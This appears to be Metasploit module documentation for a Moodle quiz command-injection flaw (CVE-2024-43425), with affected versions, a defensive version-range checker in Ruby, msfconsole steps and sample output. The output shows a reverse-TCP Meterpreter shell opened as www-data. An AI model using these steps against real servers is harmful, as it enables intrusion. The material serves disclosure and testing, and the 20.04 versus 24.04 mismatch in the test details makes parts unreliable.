Vulnerable Application
This module exploits a command injection vulnerability in Moodle (CVE-2024-43425) to obtain remote code execution. By default, the application will run in the context of www-data, so only a limited shell can be obtained.
Valid credentials are required to exploit this vulnerability. Moreover, the user must be authorized to either add a new quiz or modify an
existing one in order to reach the vulnerable function and trigger the bug. User roles that fall into this category include
Teacher and Administrator, but these might differ depending on the specific deployment and configuration.
Affected versions include:
- 4.4 to 4.4.1
- 4.3 to 4.3.5
- 4.2 to 4.2.8
- 4.1 to 4.1.11
Moodle published an advisory here.
The original advisory is available here, and a more detailed writeup is available here.
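To check an installation against the ranges listed above, the following added example (not part of the module or of Moodle) reads the `$release` string from the contents of `version.php` and compares it with those ranges. The sample file contents are constructed, and treating a `+` weekly-build suffix as the base release is an assumption.

```ruby
# Added example. Ranges are copied from the "Affected versions" list above.
AFFECTED_RANGES = [
  ['4.4', '4.4.1'],
  ['4.3', '4.3.5'],
  ['4.2', '4.2.8'],
  ['4.1', '4.1.11']
].freeze

# Constructed sample of a Moodle version.php (values are illustrative).
SAMPLE_VERSION_PHP = <<~'PHP'
  <?php
  $version  = 2024042201.00;
  $release  = '4.4.1 (Build: 20240610)';
  $branch   = '404';
PHP

# Turn "4.4", "4.4.1" or "4.3.5+ (Build: ...)" into [major, minor, patch].
# Assumption: a trailing "+" is ignored, so 4.4.1+ is treated as 4.4.1.
def parse_version(text)
  m = text.strip.match(/\A(\d+)\.(\d+)(?:\.(\d+))?/)
  return nil unless m

  [m[1].to_i, m[2].to_i, (m[3] || 0).to_i]
end

# Extract the release string from the text of version.php, or nil.
def release_from_version_php(source)
  m = source.match(/^\s*\$release\s*=\s*['"]([^'"]+)['"]/)
  m && m[1]
end

# True when the release falls inside one of the ranges listed on this page.
# False only means "not in the listed ranges", not "known to be fixed".
def in_listed_range?(release)
  v = parse_version(release)
  return false if v.nil?

  AFFECTED_RANGES.any? do |low, high|
    (v <=> parse_version(low)) >= 0 && (v <=> parse_version(high)) <= 0
  end
end

if __FILE__ == $PROGRAM_NAME
  release = release_from_version_php(SAMPLE_VERSION_PHP)
  puts "#{release}: #{in_listed_range?(release) ? 'in a listed affected range' : 'not in a listed range'}"
end
```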
Testing
Legacy releases from Moodle can be obtained from here. An installation guide is available here.
Successfully tested on
- Moodle v4.4.1 on Ubuntu 20.04 LTS
Verification Steps
- Deploy Moodle
- Start msfconsole
- use exploit/linux/http/moodle_rce
- set USERNAME <USER>
- set PASSWORD <PASSWORD>
- set CMID <ID>
- set COURSEID <ID>
- set RHOSTS <IP>
- set LHOST <IP>
- exploit
Options
USERNAME
The username to authenticate with in Moodle.
PASSWORD
The password for the user.
CMID
The course module ID. Can be retrieved from the URL when the "Add question" button is pressed within a quiz of a course (e.g., <IP>/moodle/mod/quiz/edit.php?cmid=4).
COURSEID
The course ID. Can be retrieved from the URL when the course is selected (e.g., /moodle/course/view.php?id=3).
Scenarios
Running the module against Moodle v4.4.1 should result in an output similar to the following:
msf6 > use exploit/linux/http/moodle_rce
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/moodle_rce) > set USERNAME testuser
USERNAME => testuser
msf6 exploit(linux/http/moodle_rce) > set PASSWORD iusldbf843498fKJASD
PASSWORD => iusldbf843498fKJASD
msf6 exploit(linux/http/moodle_rce) > set CMID 2
CMID => 2
msf6 exploit(linux/http/moodle_rce) > set COURSEID 2
COURSEID => 2
msf6 exploit(linux/http/moodle_rce) > set RHOSTS 192.168.217.141
RHOSTS => 192.168.217.141
msf6 exploit(linux/http/moodle_rce) > set LHOST 192.168.217.128
LHOST => 192.168.217.128
msf6 auxiliary(exploit/linux/http/moodle_rce) > exploit
[*] Started reverse TCP handler on 192.168.217.128:4444
[*] Obtaining MoodleSession and logintoken...
[+] Server reachable.
[*] Authenticating as testuser...
[*] Successfully authenticated.
[*] Obtaining sesskey, courseContextId, and category...
[*] Injecting command...
[*] Sending stage (3045380 bytes) to 192.168.217.141
[*] Meterpreter session 1 opened (192.168.217.128:4444 -> 192.168.217.141:37152) at 2024-09-01 18:19:44 -0400
[-] Exploit aborted due to failure: unreachable: Failed to receive a reply from the server.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/moodle_rce) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : 192.168.217.141
OS : Ubuntu 24.04 (Linux 6.8.0-41-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: www-data